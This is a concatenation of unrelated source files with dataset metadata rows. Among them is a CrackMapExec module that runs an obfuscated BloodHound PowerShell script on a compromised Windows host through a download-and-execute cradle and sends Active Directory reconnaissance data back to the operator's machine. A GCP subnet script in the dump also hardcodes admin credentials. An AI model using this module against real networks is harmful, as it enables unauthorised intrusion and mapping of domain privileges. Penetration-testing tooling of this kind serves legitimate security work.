tkinter.Label(lf,text="\n").pack(fill=X)
tkinter.Label(lf,text="-- Wyostrzanie --").pack(fill=X)
tkinter.Button(lf,text="Wyostrzanie liczb", command=self.OnButtonGeneratorLiczb).pack(fill=X)
tkinter.Button(lf,text="Wykres 3D", command=self.OnButtonPlaszczyznaSterowan).pack(fill=X)
tkinter.Label(lf,text="\n").pack(fill=X)
def OnButtonDefuzyfikacja(self):
self.resetFrame(self.rf)
self.guiOnButtonDefuzyfikacja.show(self.rf)
def OnButtonPlaszczyznaSterowan(self):
self.resetFrame(self.rf)
self.guiOnButtonPlaszczyznaSterowan.show(self.rf)
def resetFrame(self,frame):
for widget in frame.winfo_children():
widget.destroy()
def OnButtonReguly(self):
self.resetFrame(self.rf)
self.guiOnButtonReguly.show(self.rf)
def onButtonFPrzynaleznosci(self,dom):
self.resetFrame(self.rf)
self.guiOnButtonFPrzynaleznosci.show(self.rf, dom)
def on_resize(self,event):
self.resetFrame(self.rf)
def OnButtonGeneratorLiczb(self):
self.resetFrame(self.rf)
self.guiOnButtonGeneratorLiczb.show(self.rf)
| mit | 5,256,334,183,655,911,000 | 35.63895 | 136 | 0.708612 | false | 2.529687 | false | false | false |
jorik041/CrackMapExec | cme/modules/bloodhound.py | 1 | 6435 | from cme.helpers.powershell import *
from cme.helpers.misc import validate_ntlm
from cme.helpers.logger import write_log
from sys import exit
class CMEModule:
'''
    Executes the BloodHound recon script on the target and retrieves the results to the attacker's machine
    2 supported modes :
    CSV : exports data into CSVs on the target file system before retrieving them (NOT opsec safe)
Neo4j API : exports data directly to the Neo4j API (opsec safe)
Module by Waffle-Wrath
Bloodhound.ps1 script base : https://github.com/BloodHoundAD/BloodHound
'''
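    # Hypothetical invocation sketch (option names come from options() below;
    # the exact CrackMapExec CLI syntax may differ between versions):
    #   cme smb <target> -M bloodhound -o THREADS=5 COLLECTIONMETHOD=Default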
name = 'bloodhound'
    description = 'Executes the BloodHound recon script on the target and retrieves the results to the attacker\'s machine'
supported_protocols = ['smb']
opsec_safe= False
multiple_hosts = False
def options(self, context, module_options):
'''
        THREADS            Max number of threads to execute on target (defaults to 3)
COLLECTIONMETHOD Method used by BloodHound ingestor to collect data (defaults to 'Default')
CSVPATH (optional) Path where csv files will be written on target (defaults to C:\)
NEO4JURI (optional) URI for direct Neo4j ingestion (defaults to blank)
NEO4JUSER (optional) Username for direct Neo4j ingestion
NEO4JPASS (optional) Pass for direct Neo4j ingestion
Give NEO4J options to perform direct Neo4j ingestion (no CSVs on target)
'''
self.threads = 3
self.csv_path = 'C:\\'
self.collection_method = 'Default'
self.neo4j_URI = ""
self.neo4j_user = ""
self.neo4j_pass = ""
if module_options and 'THREADS' in module_options:
self.threads = module_options['THREADS']
if module_options and 'CSVPATH' in module_options:
self.csv_path = module_options['CSVPATH']
if module_options and 'COLLECTIONMETHOD' in module_options:
self.collection_method = module_options['COLLECTIONMETHOD']
if module_options and 'NEO4JURI' in module_options:
self.neo4j_URI = module_options['NEO4JURI']
if module_options and 'NEO4JUSER' in module_options:
self.neo4j_user = module_options['NEO4JUSER']
if module_options and 'NEO4JPASS' in module_options:
self.neo4j_pass = module_options['NEO4JPASS']
if self.neo4j_URI != "" and self.neo4j_user != "" and self.neo4j_pass != "" :
self.opsec_safe= True
self.ps_script = obfs_ps_script('BloodHound-modified.ps1')
def on_admin_login(self, context, connection):
if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" :
command = "Invoke-BloodHound -CSVFolder '{}' -Throttle '{}' -CollectionMethod '{}'".format(self.csv_path, self.threads, self.collection_method)
else :
command = 'Invoke-BloodHound -URI {} -UserPass "{}:{}" -Throttle {} -CollectionMethod {}'.format(self.neo4j_URI, self.neo4j_user, self.neo4j_pass, self.threads, self.collection_method)
launcher = gen_ps_iex_cradle(context, 'BloodHound-modified.ps1', command)
connection.ps_execute(launcher)
context.log.success('Executed launcher')
def on_request(self, context, request):
if 'BloodHound-modified.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script.encode())
context.log.success('Executing payload... this can take a few minutes...')
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.get('content-length'))
data = response.rfile.read(length).decode()
response.stop_tracking_host()
if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" :
            self.parse_output(data, context, response)
            context.log.success("Successfully retrieved data")
    def parse_output(self, data, context, response):
'''
Parse the output from Invoke-BloodHound
'''
parsedData = data.split("!-!")
        # base names only; the '.csv' extension is appended by the log_name format below
        nameList = ['user_sessions', 'group_membership', 'acls', 'local_admins', 'trusts']
for x in range(0, len(parsedData)):
if "ComputerName" in parsedData[x] and "UserName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[0], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "GroupName" in parsedData[x] and "AccountName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[1], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "ComputerName" in parsedData[x] and "AccountName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[3], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "SourceDomain" in parsedData[x] and "TrustType" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[4], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "ObjectName" in parsedData[x] and "ObjectType" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[2], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name)) | bsd-2-clause | -7,558,939,601,482,193,000 | 54.482759 | 196 | 0.605905 | false | 3.527961 | false | false | false |
avanzosc/avanzosc6.1 | avanzosc_product_category_ext/product_category_ext.py | 1 | 2095 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (http://tiny.be). All Rights Reserved
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
from osv import osv
from osv import fields
#
### HEREDO LA PRODUCTOS PARA AÑADIRLE CAMPOS NUEVOS
#
class product_category(osv.osv):
_name = 'product.category'
_inherit = 'product.category'
_columns = {'provision_type': fields.selection([('product','Stockable Product'),('consu', 'Consumable'),('service','Service')], 'Product Type', required=True, help="Will change the way procurements are processed. Consumable are product where you don't manage stock."),
'procure_method': fields.selection([('make_to_stock','Make to Stock'),('make_to_order','Make to Order')], 'Procurement Method', required=True, help="'Make to Stock': When needed, take from the stock or wait until re-supplying. 'Make to Order': When needed, purchase or produce for the procurement request."),
'supply_method': fields.selection([('produce','Produce'),('buy','Buy')], 'Supply method', required=True, help="Produce will generate production order or tasks, according to the product type. Buy will trigger purchase orders when requested."),
}
product_category()
| agpl-3.0 | 7,922,507,221,663,516,000 | 52.692308 | 324 | 0.644222 | false | 4.335404 | false | false | false |
anderdl/test3repo | scripts/releaser_hooks.py | 5 | 2587 | import subprocess
import os
import polib
import copy
import codecs
def prereleaser_middle(data):
"""
1. Run the unit tests one last time before we make a release.
2. Update the CONTRIBUTORS.txt file.
Note: Install polib (https://pypi.python.org/pypi/polib).
"""
print('Running unit tests.')
subprocess.check_output(["python", "example_project/manage.py", "test", "photologue"])
print('Running PEP8 check.')
# See setup.cfg for configuration options.
subprocess.check_output(["pep8"])
print('Updating CONTRIBUTORS.txt')
# This command will get the author of every commit.
output = subprocess.check_output(["git", "log", "--format='%aN'"])
# Convert to a list.
contributors_list = [unicode(contributor.strip("'"), 'utf-8')
for contributor in output.split("\n")]
# Now add info from the translator files. This is incomplete, we can only list
# the 'last contributor' to each translation.
for language in os.listdir('photologue/locale/'):
filename = 'photologue/locale/{0}/LC_MESSAGES/django.po'.format(language)
po = polib.pofile(filename)
last_translator = po.metadata['Last-Translator']
contributors_list.append(last_translator[:last_translator.find('<') - 1])
# Now we want to only show each contributor once, and to list them by how many
# contributions they have made - a rough guide to the effort they have put in.
contributors_dict = {}
for author in contributors_list:
author_copy = copy.copy(author)
if author_copy in ('', '(no author)', 'FULL NAME'):
# Skip bad data.
continue
# The creator of this project should always appear first in the list - so
# don't add him to this list, but hard-code his name.
if author_copy in ('Justin Driscoll', 'justin.driscoll'):
continue
# Handle contributors who appear under multiple names.
if author_copy == 'richardbarran':
author_copy = 'Richard Barran'
if author_copy in contributors_dict:
contributors_dict[author_copy] += 1
else:
contributors_dict[author_copy] = 1
with codecs.open('CONTRIBUTORS.txt', 'w', encoding='utf8') as f:
f.write('Photologue is made possible by all the people who have contributed'
' to it. A non-exhaustive list follows:\n\n')
f.write('Justin Driscoll\n')
for i in sorted(contributors_dict, key=contributors_dict.get, reverse=True):
f.write(i + '\n')
| bsd-3-clause | -3,137,737,663,403,263,500 | 35.957143 | 90 | 0.638964 | false | 4.004644 | false | false | false |
lenin/bzr-xmloutput | infoxml.py | 1 | 11232 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (C) 2007-2009 Guillermo Gonzalez
#
# The code taken from bzrlib is under: Copyright (C) 2005-2007 Canonical Ltd
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
#
# Contributors:
# Martin Albisetti
"""This code is a modified copy from bzrlib.info (see there for copyrights and
licensing)
"""
__all__ = ['show_bzrdir_info_xml']
from bzrlib import info
from bzrlib.lazy_import import lazy_import
lazy_import(globals(), """
import os, sys, time
from bzrlib import (
bzrdir,
diff,
errors,
osutils,
urlutils,
missing,
)
""")
from bzrlib.errors import (NoWorkingTree, NotBranchError,
NoRepositoryPresent, NotLocalUrl)
def get_lines_xml(self):
"""Returns the locations lines as xml."""
return ["<%s>%s</%s>" % (l.replace(' ', '_'), u, l.replace(' ', '_')) \
for l, u in self.locs ]
info.LocationList.get_lines_xml = get_lines_xml
def show_bzrdir_info_xml(a_bzrdir, verbose=False, outfile=None):
"""Output to stdout the 'info' for a_bzrdir."""
if outfile is None:
outfile = sys.stdout
try:
tree = a_bzrdir.open_workingtree(
recommend_upgrade=False)
except (NoWorkingTree, NotLocalUrl):
tree = None
try:
branch = a_bzrdir.open_branch()
except NotBranchError:
branch = None
try:
repository = a_bzrdir.open_repository()
except NoRepositoryPresent:
# Return silently; cmd_info already returned NotBranchError
# if no bzrdir could be opened.
return
else:
lockable = repository
else:
repository = branch.repository
lockable = branch
else:
branch = tree.branch
repository = branch.repository
lockable = tree
lockable.lock_read()
try:
outfile.write('<?xml version="1.0"?>')
outfile.write('<info>')
show_component_info_xml(a_bzrdir, repository, branch, tree, verbose,
outfile)
outfile.write('</info>')
finally:
lockable.unlock()
def show_component_info_xml(control, repository, branch=None,
working=None, verbose=1, outfile=None):
"""Write info about all bzrdir components to stdout"""
if outfile is None:
outfile = sys.stdout
if verbose is False:
verbose = 1
if verbose is True:
verbose = 2
layout = info.describe_layout(repository, branch, working, control)
formats = info.describe_format(control, repository,
branch, working).split(' or ')
outfile.write('<layout>%s</layout>' % layout)
outfile.write('<formats>')
if len(formats) > 1:
for format in formats:
outfile.write('<format>%s</format>' % format)
else:
outfile.write('<format>%s</format>' % formats[0])
outfile.write('</formats>')
_show_location_info_xml(info.gather_location_info(repository, branch,
working), outfile)
if branch is not None:
_show_related_info_xml(branch, outfile)
if verbose == 0:
return
_show_format_info_xml(control, repository, branch, working, outfile)
_show_locking_info_xml(repository, branch, working, outfile)
if branch is not None:
_show_missing_revisions_branch_xml(branch, outfile)
if working is not None:
_show_working_stats_xml(working, outfile)
elif branch is not None:
_show_missing_revisions_branch_xml(branch, outfile)
if branch is not None:
stats = _show_branch_stats_xml(branch, verbose==2, outfile)
else:
stats = repository.gather_stats()
if branch is None and working is None:
_show_repository_info_xml(repository, outfile)
_show_repository_stats_xml(stats, outfile)
def _show_location_info_xml(locs, outfile):
"""Show known locations for working, branch and repository."""
outfile.write('<location>')
path_list = info.LocationList(osutils.getcwd())
for name, loc in locs:
path_list.add_url(name, loc)
outfile.writelines(path_list.get_lines_xml())
outfile.write('</location>')
def _show_related_info_xml(branch, outfile):
"""Show parent and push location of branch."""
locs = info._gather_related_branches(branch)
if len(locs.locs) > 0:
outfile.write('<related_branches>')
outfile.writelines(locs.get_lines_xml())
outfile.write('</related_branches>')
def _show_format_info_xml(control=None, repository=None,
branch=None, working=None, outfile=None):
"""Show known formats for control, working, branch and repository."""
outfile.write('<format>')
if control:
outfile.write('<control>%s</control>' %
control._format.get_format_description())
if working:
outfile.write('<working_tree>%s</working_tree>' %
working._format.get_format_description())
if branch:
outfile.write('<branch>%s</branch>' %
branch._format.get_format_description())
if repository:
outfile.write('<repository>%s</repository>' %
repository._format.get_format_description())
outfile.write('</format>')
def _show_locking_info_xml(repository, branch=None, working=None, outfile=None):
"""Show locking status of working, branch and repository."""
if (repository.get_physical_lock_status() or
(branch and branch.get_physical_lock_status()) or
(working and working.get_physical_lock_status())):
outfile.write('<lock_status>')
if working:
if working.get_physical_lock_status():
status = 'locked'
else:
status = 'unlocked'
            outfile.write('<working_tree>%s</working_tree>' % status)
if branch:
if branch.get_physical_lock_status():
status = 'locked'
else:
status = 'unlocked'
outfile.write('<branch>%s</branch>' % status)
if repository:
if repository.get_physical_lock_status():
status = 'locked'
else:
status = 'unlocked'
outfile.write('<repository>%s</repository>' % status)
outfile.write('</lock_status>')
def _show_missing_revisions_branch_xml(branch, outfile):
"""Show missing master revisions in branch."""
# Try with inaccessible branch ?
master = branch.get_master_branch()
if master:
local_extra, remote_extra = missing.find_unmerged(branch, master)
if remote_extra:
outfile.write('<branch_stats>')
            outfile.write('<missing_revisions>%d</missing_revisions>' %
                          len(remote_extra))
outfile.write('</branch_stats>')
def _show_missing_revisions_working_xml(working, outfile):
"""Show missing revisions in working tree."""
branch = working.branch
basis = working.basis_tree()
branch_revno, branch_last_revision = branch.last_revision_info()
try:
tree_last_id = working.get_parent_ids()[0]
except IndexError:
tree_last_id = None
if branch_revno and tree_last_id != branch_last_revision:
tree_last_revno = branch.revision_id_to_revno(tree_last_id)
missing_count = branch_revno - tree_last_revno
outfile.write('<missing_revisions>%d</missing_revisions>' %
missing_count)
def _show_working_stats_xml(working, outfile):
"""Show statistics about a working tree."""
basis = working.basis_tree()
delta = working.changes_from(basis, want_unchanged=True)
outfile.write('<working_tree_stats>')
_show_missing_revisions_working_xml(working, outfile)
outfile.write('<unchanged>%s</unchanged>' % len(delta.unchanged))
outfile.write('<modified>%d</modified>' % len(delta.modified))
outfile.write('<added>%d</added>' % len(delta.added))
outfile.write('<removed>%d</removed>' % len(delta.removed))
outfile.write('<renamed>%d</renamed>' % len(delta.renamed))
ignore_cnt = unknown_cnt = 0
for path in working.extras():
if working.is_ignored(path):
ignore_cnt += 1
else:
unknown_cnt += 1
outfile.write('<unknown>%d</unknown>' % unknown_cnt)
outfile.write('<ignored>%d</ignored>' % ignore_cnt)
dir_cnt = 0
for path, entry in working.iter_entries_by_dir():
if entry.kind == 'directory' and entry.parent_id is not None:
dir_cnt += 1
outfile.write('<versioned_subdirectories>%d</versioned_subdirectories>' %
(dir_cnt))
outfile.write('</working_tree_stats>')
def _show_branch_stats_xml(branch, verbose, outfile):
"""Show statistics about a branch."""
revno, head = branch.last_revision_info()
outfile.write('<branch_history>')
outfile.write('<revisions>%d</revisions>' % (revno))
stats = branch.repository.gather_stats(head, committers=verbose)
if verbose:
committers = stats['committers']
outfile.write('<committers>%d</committers>' % (committers))
if revno:
timestamp, timezone = stats['firstrev']
age = int((time.time() - timestamp) / 3600 / 24)
outfile.write('<days_old>%d</days_old>' % (age))
outfile.write('<first_revision>%s</first_revision>' % \
osutils.format_date(timestamp, timezone))
timestamp, timezone = stats['latestrev']
outfile.write('<latest_revision>%s</latest_revision>' % \
osutils.format_date(timestamp, timezone))
outfile.write('</branch_history>')
return stats
def _show_repository_info_xml(repository, outfile):
"""Show settings of a repository."""
## FIXME/TODO: is this needed in the xml output?
#if repository.make_working_trees():
# print 'Create working tree for new branches inside the repository.'
def _show_repository_stats_xml(stats, outfile):
"""Show statistics about a repository."""
if 'revisions' in stats or 'size' in stats:
outfile.write('<repository_stats>')
if 'revisions' in stats:
revisions = stats['revisions']
outfile.write('<revisions>%d</revisions>' % (revisions))
if 'size' in stats:
outfile.write('<size unit="KiB">%d</size>' % (stats['size']/1024))
if 'revisions' in stats or 'size' in stats:
outfile.write('</repository_stats>')
| gpl-2.0 | -8,681,474,784,516,593,000 | 36.069307 | 80 | 0.61948 | false | 3.99431 | false | false | false |
brampling/infoblox-gcp-poc | delete_subnet.py | 1 | 1501 | #!/usr/bin/python
import gcloudutils
import sys
import requests
import argparse
from infoblox_client import connector
from infoblox_client import objects
from requests.auth import HTTPBasicAuth
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from oauth2client.client import GoogleCredentials
from googleapiclient import discovery
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
credentials = GoogleCredentials.get_application_default()
compute = discovery.build('compute', 'v1', credentials=credentials)
parser = argparse.ArgumentParser(
description='Create a number of VMs in Google Compute Engine. Google Cloud SDK must be installed and configured (gcloud init) and google-api-python-client and infoblox-client Python libraries must be installed.')
parser.add_argument('name', nargs='+', help='List of FQDNs for VMs to delete separated by spaces')
args=parser.parse_args()
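# Hypothetical invocation (subnet names are illustrative):
#   ./delete_subnet.py my-subnet-1 my-subnet-2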
niosip = '10.60.27.4'
niosuser = 'admin'
niospw = 'infoblox'
project='mythic-brook-146218'
zone='us-west1-a'
#name = args.name
splitzone = zone.split('-',2)
region = splitzone[0] + '-' + splitzone[1]
opts = {'host': niosip, 'username': niosuser, 'password': niospw}
conn = connector.Connector(opts)
for name in args.name:
gotnet = gcloudutils.get_subnet(compute, project, region, name)
addr = gotnet['ipCidrRange']
gcloudutils.delete_subnet(compute, project, region, name)
netobj = objects.Network.search(conn, cidr=addr)
netdelete = objects.Network.delete(netobj)
| apache-2.0 | 3,885,868,715,293,898,000 | 37.487179 | 220 | 0.781479 | false | 3.458525 | false | false | false |
aristanetworks/arista-ovs-quantum | quantum/tests/unit/nicira/test_nicira_plugin.py | 3 | 2339 | # Copyright (c) 2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import mock
import quantum.common.test_lib as test_lib
from quantum.tests.unit.nicira import fake_nvpapiclient
import quantum.tests.unit.test_db_plugin as test_plugin
NICIRA_PKG_PATH = 'quantum.plugins.nicira.nicira_nvp_plugin'
class NiciraPluginV2TestCase(test_plugin.QuantumDbPluginV2TestCase):
_plugin_name = ('%s.QuantumPlugin.NvpPluginV2' % NICIRA_PKG_PATH)
def setUp(self):
etc_path = os.path.join(os.path.dirname(__file__), 'etc')
test_lib.test_config['config_files'] = [os.path.join(etc_path,
'nvp.ini.test')]
# mock nvp api client
self.fc = fake_nvpapiclient.FakeClient(etc_path)
self.mock_nvpapi = mock.patch('%s.NvpApiClient.NVPApiHelper'
% NICIRA_PKG_PATH, autospec=True)
instance = self.mock_nvpapi.start()
instance.return_value.login.return_value = "the_cookie"
def _fake_request(*args, **kwargs):
return self.fc.fake_request(*args, **kwargs)
instance.return_value.request.side_effect = _fake_request
super(NiciraPluginV2TestCase, self).setUp(self._plugin_name)
def tearDown(self):
self.fc.reset_all()
super(NiciraPluginV2TestCase, self).tearDown()
self.mock_nvpapi.stop()
class TestNiciraBasicGet(test_plugin.TestBasicGet, NiciraPluginV2TestCase):
pass
class TestNiciraV2HTTPResponse(test_plugin.TestV2HTTPResponse,
NiciraPluginV2TestCase):
pass
class TestNiciraPortsV2(test_plugin.TestPortsV2, NiciraPluginV2TestCase):
pass
class TestNiciraNetworksV2(test_plugin.TestNetworksV2,
NiciraPluginV2TestCase):
pass
| apache-2.0 | 9,094,450,046,732,250,000 | 32.898551 | 77 | 0.678923 | false | 3.512012 | true | false | false |
nexus511/gpd-ubuntu-packages | packages/gpdpocket-power/make.py | 1 | 2841 | import shutil
import subprocess
import os
import tarfile
class Config(object):
build = os.path.abspath("build")
files = os.path.abspath("files")
output = os.path.abspath("output")
manifest = os.path.abspath("build/DEBIAN")
temp = os.path.abspath("tmp")
templates = os.path.abspath("files/DEBIAN")
version = "0.1.0"
variables = {
"architecture": "all",
"maintainer": "Falk Garbsch <[email protected]>",
"name": "gpdpocket-power",
}
print "first we clean up our stuff"
config = Config()
for rdir in [config.build, config.temp, config.output]:
try:
print ">> remove %s" % (rdir)
shutil.rmtree(rdir)
except:
pass
print "create directories"
os.makedirs(config.temp)
os.makedirs(config.output)
os.makedirs(config.build)
os.makedirs(config.manifest)
print "copy files"
copylist = [
( 'files/gpd-fan.conf', '/etc/gpd/fan.conf', 0644 ),
( 'files/gpd-fan.py', '/usr/local/sbin/gpd-fan', 0755 ),
( 'files/gpd-fan.service', '/etc/systemd/system/gpd-fan.service', 0644 ),
( 'files/gpd-fan.sh', '/lib/systemd/system-sleep/gpd-fan', 0755 ),
( 'files/tlp', '/etc/default/tlp', 0644 )
]
for src, dst, mode in copylist:
print ">> copy (0%o) %s" % (mode, dst)
src = os.path.abspath(src)
dst = config.build + dst
dn = os.path.dirname(dst)
if not os.path.isdir(dn):
os.makedirs(dn)
shutil.copy(src, dst)
os.chmod(dst, mode)
print "enable systemd service"
src = "/etc/systemd/system/gpd-fan.service"
dst = config.build + "/etc/systemd/system/basic.target.wants/gpd-fan.service"
dn = os.path.dirname(dst)
if not os.path.isdir(dn):
    os.makedirs(dn)
if not os.path.exists(dst):
    os.symlink(src, dst)
print "create blacklist item"
blacklist = config.build + "/etc/pm/config.d/brcmfmac"
dn = os.path.dirname(blacklist)
if not os.path.isdir(dn):
os.makedirs(dn)
fp = open(blacklist, "wb")
fp.write("SUSPEND_MODULES=\"brcmfmac\"\n")
fp.flush()
fp.close()
print "write control"
variables = config.variables
variables["version"] = config.version
control = open(config.files + "/DEBIAN/control", "rb").read()
fp = open(config.manifest + "/control", "wb")
fp.write(control.format(**variables))
fp.flush()
fp.close()
print "constructing script files"
for script in ["/postinst", "/postrm", "/preinst", "/prerm"]:
print ">> write DEBIAN%s" % (script)
filepath = config.manifest + script
content = open(config.templates + script, "rb").read()
fp = open(filepath, "wb")
fp.write(content.replace("__VERSION_CODE__", variables["version"]))
fp.flush()
fp.close()
os.chmod(filepath, 0555)
print "building binary package"
command = ["fakeroot", "dpkg-deb", "-b", config.build]
command.append("%s/%s-%s.deb" % (config.output, variables["name"], variables["version"]))
subprocess.call(command)
print "done"
| gpl-3.0 | 1,494,709,160,688,461,800 | 28.59375 | 89 | 0.655403 | false | 3 | true | false | false |
heynemann/mememe | engine/models.py | 1 | 2443 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Lincoln de Sousa <[email protected]>
# Copyright (C) 2010 Gabriel Falcão <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from glob import glob
from ConfigParser import ConfigParser
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils import simplejson
class Plugin(object):
name = None
description = None
js_url = None
html_url = None
slug = None
default = False
def to_dict(self):
d = {
'name': self.name,
'description': self.description,
'slug': self.slug,
'js_url': self.js_url,
'html_url': self.html_url,
'default': self.default,
}
return d
def to_json(self):
return simplejson.dumps(self.to_dict())
@classmethod
def fetch_all(cls):
plugins = []
files = glob(os.path.join(settings.PLUGINS_DIRECTORY, "*.cfg"))
for i in files:
fname = os.path.splitext(os.path.basename(i))[0]
plugin = cls()
cfg = ConfigParser()
cfg.read(os.path.abspath(i))
plugin.name = cfg.get('Default', 'name')
plugin.slug = fname
plugin.description = cfg.get('Default', 'description')
plugin.js_url = reverse('plugins-url',
kwargs={'path': '%s.js' % fname})
plugin.html_url = reverse('plugins-url',
kwargs={'path': '%s.html' % fname})
if cfg.has_option('Default', 'default'):
plugin.default = cfg.getboolean('Default', 'default')
else:
plugin.default = False
plugins.append(plugin)
return plugins
| agpl-3.0 | 5,188,528,998,554,488,000 | 32.916667 | 74 | 0.604832 | false | 4.043046 | false | false | false |
openstack/rally | rally/common/db/migrations/versions/2017_10_9a18c6fe265c_rename_namespace_to_platform.py | 1 | 1124 | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Rename Namespace To Platform
Revision ID: 9a18c6fe265c
Revises: 046a38742e89
Create Date: 2017-10-12 17:28:17.636938
"""
from alembic import op
from rally import exceptions
# revision identifiers, used by Alembic.
revision = "9a18c6fe265c"
down_revision = "046a38742e89"
branch_labels = None
depends_on = None
def upgrade():
with op.batch_alter_table("verifiers") as batch_op:
batch_op.alter_column("namespace", new_column_name="platform")
def downgrade():
raise exceptions.DowngradeNotSupported()
| apache-2.0 | 9,216,170,407,023,605,000 | 27.1 | 78 | 0.732206 | false | 3.556962 | false | false | false |
galileo-press/django-lint | django_lint_example/example/models/__init__.py | 4 | 4702 | from django.db import models
from django.contrib import admin
class NullableModel(models.Model):
TRUTH_VALUE = True
charfield = models.CharField(max_length=100, null=True, blank=True)
charfield_2 = models.CharField(max_length=100, null=TRUTH_VALUE)
textfield = models.TextField(null=True, blank=True)
boolean_false = models.BooleanField(default=True)
nullable_boolean = models.NullBooleanField()
# We should still report about the following field, but we cannot
# determine its name.
models.NullBooleanField()
class UniqueForModels(models.Model):
time = models.DateTimeField()
u_date = models.IntegerField(unique_for_date='time')
u_month = models.IntegerField(unique_for_month='time')
u_year = models.IntegerField(unique_for_year='time')
class ParentModel(models.Model):
parent = models.ForeignKey('self')
class StrModel(models.Model):
dummy = models.CharField(max_length=1)
def __str__(self):
return "__str__ method"
def __unicode__(self):
return self.dummy
class NullBlankModel(models.Model):
number = models.IntegerField(blank=True)
class BigModel(models.Model):
field01 = models.IntegerField()
field02 = models.IntegerField()
field03 = models.IntegerField()
field04 = models.IntegerField()
field05 = models.IntegerField()
field06 = models.IntegerField()
field07 = models.IntegerField()
field08 = models.IntegerField()
field09 = models.IntegerField()
field10 = models.IntegerField()
field11 = models.IntegerField()
field12 = models.IntegerField()
field13 = models.IntegerField()
field14 = models.IntegerField()
field15 = models.IntegerField()
field16 = models.IntegerField()
field17 = models.IntegerField()
field18 = models.IntegerField()
field19 = models.IntegerField()
field20 = models.IntegerField()
field21 = models.IntegerField()
field22 = models.IntegerField()
field23 = models.IntegerField()
field24 = models.IntegerField()
field25 = models.IntegerField()
field26 = models.IntegerField()
field27 = models.IntegerField()
field28 = models.IntegerField()
field29 = models.IntegerField()
field30 = models.IntegerField()
field31 = models.IntegerField()
class NoFieldsModel(models.Model):
pass
class Post(models.Model):
title = models.CharField(max_length=100)
content = models.CharField(max_length=1000)
views = models.PositiveSmallIntegerField()
words = models.SmallIntegerField()
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
def __unicode__(self):
return self.title
class Comment(models.Model):
post = models.ForeignKey(Post)
url = models.URLField()
def __unicode__(self):
return self.url
class MisorderedMethodsModel(models.Model):
dummy = models.CharField(max_length=1)
def incorrect_place(self):
pass
def get_absolute_url(self):
pass
def __unicode__(self):
# This should be swapped with get_absolute_url
pass
def correct_place(self):
pass
class Model1(models.Model):
dummy = models.CharField(max_length=1)
class Meta:
verbose_name_plural = 'right'
def __unicode__(self):
return self.dummy
class Model2(models.Model):
dummy = models.CharField(max_length=1)
def __unicode__(self):
